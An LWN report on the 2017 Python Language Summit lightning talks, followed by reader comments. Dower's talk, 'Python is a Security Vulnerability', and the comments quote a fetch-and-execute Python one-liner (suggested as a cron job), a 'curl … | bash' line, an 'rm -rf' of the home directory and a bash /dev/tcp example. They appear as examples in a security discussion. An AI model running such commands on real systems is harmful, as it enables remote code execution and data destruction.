Language summit lightning talks

By Jake Edge
June 7, 2017

Over the course of the day, the 2017 Python Language Summit hosted a handful of lightning talks, several of which were worked into the dynamic schedule when an opportunity presented itself. They ranged from the traditional "less than five minutes" format to some that strayed well outside of that time frame—some generated a fair amount of discussion as well. Topics were all over the map: board elections, beta releases, Python as a security vulnerability, Jython, and more.

MicroPython versus CPython

The first entry here was not actually billed as a lightning talk, but it fits the model pretty well. Mark Shannon briefly described some of the differences between MicroPython and the CPython reference implementation right after lunch. MicroPython is an implementation of the language that targets microcontroller hardware; LWN looked at it running on the pyboard development hardware back in 2015.

Larry Hastings introduced the session by noting that MicroPython is the first competing implementation that has Python 3 support. Shannon held up a BBC micro:bit board, which runs MicroPython and has been given to students in the UK, and noted that it only has 16KB of memory. He asked how many attendees had 16GB in their laptops and got a few hands.

MicroPython is a severely memory-constrained version of Python 3, but it does come with most of the standard library. In fact, it has asyncio support, for example. It is not CPython, but is a completely new implementation of the language. The micro:bit has 256KB of flash memory and MicroPython runs from the flash. Most of the data is immutable and lives in flash as well. Hastings noted that MicroPython has a tracing garbage collector, rather than using reference counting as CPython does.
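
The distinction Hastings drew can be seen from the CPython side. What follows is a minimal sketch that only illustrates CPython's behavior using the standard gc and weakref modules; the Node class is a made-up name, and nothing here says anything about how MicroPython's collector is implemented. An object that is not part of a cycle is freed as soon as its last reference goes away, while a reference cycle lingers until a tracing pass runs.

```python
import gc
import weakref


class Node:
    """Hypothetical class used only for this illustration."""

    def __init__(self):
        self.other = None


gc.disable()  # keep the cyclic collector from running on its own during the demo
try:
    # Case 1: no cycle. Reference counting frees the object immediately.
    a = Node()
    a_ref = weakref.ref(a)
    del a
    freed_without_cycle = a_ref() is None

    # Case 2: a two-object cycle. The counts never drop to zero by themselves.
    b, c = Node(), Node()
    b.other, c.other = c, b
    b_ref = weakref.ref(b)
    del b, c
    freed_before_collect = b_ref() is None

    gc.collect()  # the tracing pass finds and frees the unreachable cycle
    freed_after_collect = b_ref() is None
finally:
    gc.enable()

print(freed_without_cycle, freed_before_collect, freed_after_collect)
```

On CPython this prints True False True; an implementation that relies purely on a tracing collector makes no promise about the first value.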

Michael Foord spoke up to extol the micro:bit device, which costs around $20. It is "easy to play with" and has almost all of the features of Python, including the dynamic features. There is a book coming out in June about it. Overall, "it is a great, fun thing to experiment with."

PSF board

In the first real lightning talk, Hastings had a suggestion for the assembled core developers: run for the Python Software Foundation (PSF) board of directors. He noted that the 2006-2007 board was dominated by core developers (seven out of eight), while the 2016-2017 board has a single core developer (Kushal Das).

He said that he thought it would be "lovely to see more core developers" on the board, so he asked those present to nominate themselves (or other core developers) by the May 25 deadline, which was one week away when he gave the talk. When Hastings was asked if he would be running, though, he said "I don't have time for that" with a bit of a grin. In the end, the board nominations have closed; there are two core developers (Das and Thomas Wouters) on the list, which has 22 entries for 11 seats.

Why beta?

Łukasz Langa questioned the value of the beta phase for Python releases in his lightning talk. He asked: "did your company use the beta of 3.6?" The beta period is nearly five months long and is meant to "surface issues" in the code, but he is not really sure that is happening. So he is concerned that the project is not using that time well.

Furthermore: "what is the point of the 3.6.x point releases?" He wondered if a stable branch would better serve the community. But many attendees responded that the point releases were valuable and that an always-stable branch would not suit their needs.

Where Langa works, at Facebook, the point releases have not been all that helpful; they introduce regressions and "some are pretty bad". His perspective may be somewhat skewed, however, since his code base is heavily dependent on the asyncio and typing modules. But, by running his tests on code from the 3.6 branch, he was able to find a bug that was introduced after 3.6.0 and get it fixed before 3.6.1 was released.

He suggested that more people start testing before the releases are made. He has already been doing some testing on the 3.7 branch, for example. He noted that Brett Cannon has a blog post about doing that. Core developers should also be aware that there are some people out there testing what is getting committed to stable, and even development, branches.

Barry Warsaw noted that Linux distributions use the betas and release candidates as they prepare for their releases. Ned Deily said that getting "more eyes on daily builds" would be great, but the point releases are important because of all the different platforms that need to be supported. But Langa is not advocating getting rid of the point releases; since there are no betas for point releases, he wants to see more testing before the release. But point releases are only for bug fixes, Deily said, not for new features. Langa is concerned that point releases also introduce regressions, however.

The beta release provides an important psychological barrier for developers, Guido van Rossum said; it is not meant for customers. Another attendee pointed out that the release candidate(s) for point releases are effectively the betas for those releases. But there is little testing of betas or release candidates, Langa said; there are always small things that are wrong and clearly have not been tested.

Beta releases do provide a platform for third-party developers, though, Deily said. Libraries and modules can test with them to ensure their code will work with the upcoming release. Python upstream does make that available, Langa said, but the external world is not really using it. The alternative is for the Python project to do more of that testing itself, Deily said.

Stable branches open up another pitfall, though, an attendee said. For example, at one point NumPy added a feature in its Git repository that needed to be changed fairly soon afterward. Unfortunately, SciPy had committed its own change based on that code, so NumPy had to carry backward compatibility hacks for a feature that was never intended to be stable. Once something has been committed to a stable branch in Git, people assume that it is completely baked; "if it breaks later, it is our problem".

Another attendee suggested that other projects are not likely to test with a beta release, but might with a release candidate. That led Hastings to jokingly suggest that Python "just cross out the word beta and replace it with rc [release candidate]". "In crayon", Warsaw added with a grin.

Ordered dictionaries

CPython 3.6 changed its dictionary implementation to one that is more compact, so it uses less memory, but that also preserves the order that keys are inserted. That resolves PEP 468, which is about preserving the order of keyword arguments in the dictionary passed to functions, but it may have an unintended side effect as well. Gregory P. Smith wanted to discuss that in his lightning talk.
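
The guarantee that PEP 468 provides can be observed directly in Python 3.6 and later. This is a minimal sketch; the function name show_order and the argument names are invented for illustration.

```python
def show_order(**kwargs):
    """Return the keyword argument names in the order the function received them."""
    return list(kwargs)


# Hypothetical argument names, deliberately not in alphabetical order.
order = show_order(zebra=1, apple=2, mango=3)
print(order)
```

Under PEP 468 the names come back in call order (zebra, apple, mango) rather than in sorted or hash order.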

Smith is concerned that Python code will start to rely on the fact that dictionary insertion order is preserved, which is, for now, simply a CPython implementation decision. Other Python implementations may make other choices, so some code could break unexpectedly. He wondered if a change should be made for Python 3.7.

In particular, he suggested that the iteration order for dictionaries could be changed slightly. Those that need ordering could use collections.OrderedDict explicitly. He said that the disordering does not necessarily need to be random, though that would be fine; it just needs to change the order enough so that reliance on ordering would be picked up in testing.
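
Seen from the user's side, the idea might look roughly like the sketch below: code that needs ordering asks for it with collections.OrderedDict, and a test perturbs key order so that hidden reliance shows up. The helper reordered and the two sample functions are hypothetical names; no such API was proposed in the talk. The helper itself assumes an interpreter where plain dictionaries keep insertion order (CPython 3.6 or later).

```python
from collections import OrderedDict


def reordered(mapping):
    """Hypothetical test helper: same items, reversed insertion order."""
    return dict(reversed(list(mapping.items())))


def first_key_fragile(mapping):
    # Silently relies on iteration order.
    return next(iter(mapping))


def first_key_explicit(mapping):
    # Picks a key by value comparison, so iteration order is irrelevant.
    return min(mapping)


settings = {"host": "example.org", "port": 8080, "debug": False}

# A test that feeds both orderings exposes the order-dependent function.
fragile_changed = first_key_fragile(settings) != first_key_fragile(reordered(settings))
explicit_changed = first_key_explicit(settings) != first_key_explicit(reordered(settings))

# OrderedDict states the ordering requirement and compares order-sensitively.
od1 = OrderedDict([("a", 1), ("b", 2)])
od2 = OrderedDict([("b", 2), ("a", 1)])
ordered_equal = od1 == od2
plain_equal = dict(od1) == dict(od2)

print(fragile_changed, explicit_changed, ordered_equal, plain_equal)
```

Reversal is only one possible perturbation; as Smith noted, any change large enough to trip the tests would serve.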

He suggested that, for 3.7, either the ordering be broken or that Python declare that all dictionaries must be ordered. If the latter is done, would there be a need for an UnorderedDict, an attendee asked. Smith did not think there would be any users for that, but it could be done if needed. The issue is now on the core developers' radar, but no firm conclusion was reached in the talk.

Python as a security vulnerability

Steve Dower had a provocative title for his lightning talk: "Python is a Security Vulnerability". His point was that Python (and other, similarly powerful languages) installed on a system gives attackers a tool that can be easily used to further their aims. Normally, when we think of security vulnerabilities, we think of things like buffer overruns, but in some sense, the Python language and its libraries also qualify.

He said he often hears statements like "I love it when I find a system with Python installed ... it's basically already owned". Red teams and penetration testers love to find Python on systems they access, he said. As a thought experiment, he posited that if you could somehow get one shell command executed on a workstation inside the US National Security Agency (NSA), that command might well be something like:

    python -c "exec(urlopen(...).read())"

Adding it as a cron job would be even more effective.

So, what should be done about this? The Python core development community needs to acknowledge the problem; it is the reason that many corporate networks ban Python, for example. The community should also look for ways to change Python to make things better. Creating a locked-down version of the language and libraries to make it harder for attackers to abuse might be something to consider.
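
To make "locked down" slightly more concrete, here is one purely illustrative possibility, not something presented in the talk: a wrapper that executes source text only when its SHA-256 digest appears on an allowlist. The names ALLOWED_DIGESTS, APPROVED_SOURCE, and run_if_approved are hypothetical. A check written in Python like this one is trivially bypassed by calling exec() directly, so a real restriction would have to live inside the interpreter itself.

```python
import hashlib

# Hypothetical allowlist: digests of scripts an administrator has reviewed.
APPROVED_SOURCE = "result = 6 * 7\n"
ALLOWED_DIGESTS = {hashlib.sha256(APPROVED_SOURCE.encode("utf-8")).hexdigest()}


def run_if_approved(source, namespace=None):
    """Execute source only if its digest is on the allowlist."""
    digest = hashlib.sha256(source.encode("utf-8")).hexdigest()
    if digest not in ALLOWED_DIGESTS:
        raise PermissionError("source is not on the allowlist")
    namespace = {} if namespace is None else namespace
    exec(compile(source, "<approved>", "exec"), namespace)
    return namespace


# The reviewed script runs; anything else is refused before execution.
ns = run_if_approved(APPROVED_SOURCE)
try:
    run_if_approved("result = 'anything else'\n")
    rejected = False
except PermissionError:
    rejected = True

print(ns["result"], rejected)
```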

PyCharm update

A brief update on the PyCharm integrated development environment (IDE) for Python was up next. Dmitry Trofimov and Andrey Vlasovskikh noted that for the first time, Python 3 use was larger than that of Python 2 in PyCharm. Almost all of the Python 2 use is 2.7, while Python 3 has mostly 3.5 and 3.6 users, though there is a lingering contingent of 3.4 users.

The PyCharm debugger now supports the PEP 523 frame evaluation API. That has sped up the debugger by 20x; it started out as a 40x improvement, but that dropped to the current level when a subtle bug was fixed. It is a rare PEP that affects the debugger, they said; there should be more of those. The API should also be considered for backporting to 2.7, they said.

They also wanted to point out the new profiler for Python, VMProf. It was developed by the PyPy project with cooperation from JetBrains, which is the company behind PyCharm. VMProf is a native profiler for Python that runs on macOS, Windows, and Linux.

Jython

The final lightning talk was given by Darjus Loktevic, who lamented the sad state of the Jython project, which is an implementation of Python for the Java virtual machine. Jython is still under development, he said, but it has a small team (2-5 active developers). The project is close to releasing Jython 2.7.1, which is more or less the same as CPython 2.7.11. It has a Jython Native Interface (JyNI) that can be used to run Python's C extensions (e.g. NumPy) in Jython.

But, he asked, is Jython still relevant today? The question came up in a Reddit thread recently, he said. The problem with Jython is that it is not Python enough to run things out of the box—tests fail, little bits and pieces are different or not supported. On the other hand, Jython is not Java enough either; it is not a great scripting language for Java and it is stuck on 2.7, which is not that great, he said.

The "killer features" for Jython are that it can call Java classes from Python code and that it lacks a global interpreter lock (GIL). Jython has had no GIL for a long time, but no one seems to care, Loktevic said. Maybe more would care if some of the other features were sorted out better.

Going forward, there will be an effort to make JyNI better, so that more C extensions can run. Also, the clamp project will allow Python code to be compiled into Java jar files so it can be directly imported into Java. Jython plans to move to GitHub and reuse the core workflow. His talk had to wind down rather abruptly at that point as the summit had run more than an hour late.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]


Posted Jun 8, 2017 10:40 UTC (Thu) by mb (subscriber, #50428) [Link] (9 responses)

>he posited that you could somehow get one shell command executed on a workstation inside the US National Security Agency (NSA); that command might well be something like:
> python -c "exec(urlopen(...).read())"

Or it might be
rm -rf "$HOME"/*
or something similar.
I don't see how Python is a problem here.

Posted Jun 8, 2017 16:21 UTC (Thu) by stevedower (guest, #116614) [Link] (8 responses)

Python is certainly not unique, but when your audience is the Python core development team it makes sense to focus on that one rather than all the other tools that also let you run large volumes of unverified and untraceable arbitrary code :)

Posted Jun 8, 2017 20:51 UTC (Thu) by mb (subscriber, #50428) [Link] (7 responses)

> it makes sense to focus on that one

No, it doesn't.
You're lost already if you can execute arbitrary binaries.
Whether that is python, bash, perl or anything else does not matter at all.

To make it even worse, the following sentence simply is complete nonsense:
> ... if you could somehow get one shell command executed on a workstation ... that command might well be something like: python

If you have a shell, you already have a Turing-complete language. You don't need Python.

Posted Jun 8, 2017 20:53 UTC (Thu) by mjg59 (subscriber, #23239) [Link] (5 responses)

> If you have a shell, you already have a turing complete language. You don't need Python.

If your goal is to exploit a kernel vulnerability in a device driver then you're going to find it much easier to call ioctl() from Python than from bash

Posted Jun 9, 2017 9:31 UTC (Fri) by NAR (subscriber, #1313) [Link] (3 responses)

I think the question is not whether it is easy, but whether it is possible. Once one person implements and releases a technique to call ioctl() from the shell (something like "upload this binary garbage, write it to a file, give execute permissions, execute with these parameters"), the rest of the world can (ab)use it. By the way, on the system I'm typing this comment on, there's a tool called blockdev installed which (according to its manual) is used to "call block device ioctls from the command line". So it looks like calling some ioctls is not that complicated, at least on this system.

Posted Jun 9, 2017 18:41 UTC (Fri) by mjg59 (subscriber, #23239) [Link]

If you've got some sort of executable control mechanism then uploading new binaries isn't going to get you very far. Python is definitely more interesting, since it doesn't have any mechanism for verifying that the code it's about to execute is itself trustworthy (especially since you can pass that code as an argument)

Posted Jun 10, 2017 0:25 UTC (Sat) by nybble41 (subscriber, #55106) [Link] (1 responses)

> So it looks like calling some ioctls is not that complicated, at least on this system.

It might be worth pointing out that Perl also provides a built-in mechanism for invoking raw ioctls on any file descriptor[1], so this issue is hardly specific to Python. If anything, a Perl script to perform ioctls would probably be more likely to work on arbitrary systems than the equivalent Python script. If an attacker can run code of their choice in just about any general-purpose scripting language, you've already lost.

[1] https://perldoc.perl.org/functions/ioctl.html

Posted Jun 10, 2017 7:22 UTC (Sat) by mjg59 (subscriber, #23239) [Link]

Yeah Python certainly isn't special here, there's any number of interpreted languages that give the same capability. But bash isn't really one of them, and so it's reasonable to distinguish between "arbitrary shell access" and "I can execute a full featured language interpreter"

Posted Jun 9, 2017 15:38 UTC (Fri) by hkario (subscriber, #94864) [Link]

Do you know that regular bash can do TCP connections?

https://www.linuxjournal.com/content/more-using-bashs-built-devtcp-file-tcpip

from there:

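# open a read/write TCP connection on file descriptor 3
exec 3<>/dev/tcp/www.google.com/80
# send a minimal HTTP request over the socket
echo -e "GET / HTTP/1.1\r\nhost: www.google.com\r\nConnection: close\r\n\r\n" >&3
# read the response back from the socket
cat <&3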

Posted Jun 9, 2017 10:47 UTC (Fri) by jwilk (subscriber, #63328) [Link]

Turing completeness is about computational power.
It's neither sufficient nor necessary to do malicious stuff.

Posted Jun 8, 2017 11:01 UTC (Thu) by grawity (subscriber, #80596) [Link] (2 responses)

> that command might well be something like:
> python -c "exec(urlopen(...).read())"

By the same logic, that command might well be something like:

curl http://… | bash

It has nothing to do with Python – the same applies to literally any code interpreter, even if you do what PowerShell does and require code signing for all scripts. Once you have code execution, you have code execution.

Posted Jun 8, 2017 15:37 UTC (Thu) by dps (guest, #5725) [Link]

If you do fascist security moves like making /tmp, and other similar places to the extent they exist, separate filesystems and mounting them with the noexec option, then finding a writable place to store a binary so you can run it might be really difficult. Attempting to bypass noexec by using ld-linux.so.2 or ld-linux-x86-64.so.2 does not work. I don't need execute permission to run pure python malware. I could run shell scripts too, but the access I can get to system calls is much less, especially on stripped down systems with everything not required removed.

In the case of python code I might suggest adding a signature and using a modified version of python which will only run signed scripts and check for execute permission first. Compiling lots of things into C extensions using something like cython might make this a bit easier and more convincing. I have not met a corporate environment where python is banned, but then I have also always had a C compiler and a job which involves writing non-malicious python scripts.

Where I currently work even the production boxes have tools like gdb installed, which makes me think that somebody having a long and hard look at what is actually required and removing everything not required would be a really good idea. python would make the cut because quite a lot of things that should be present are actually written in python. I suspect that at least some of the other p* languages, which are currently installed, would not.

Posted Jun 10, 2017 10:40 UTC (Sat) by robert_s (subscriber, #42402) [Link]

Not quite. If you do the curl trick your script (executed in bash) has to probe for the existence of the various tools it may need to do what it wants to.

In the python example, the executed python code almost always has access to the full, predictable, python standard lib. Which I think is the crux of the issue - the "batteries included" nature of python.

Of course, this isn't about it being an absolute security factor; code execution is code execution. It's about the added convenience for the attacker. And no, I have no solution to propose for it.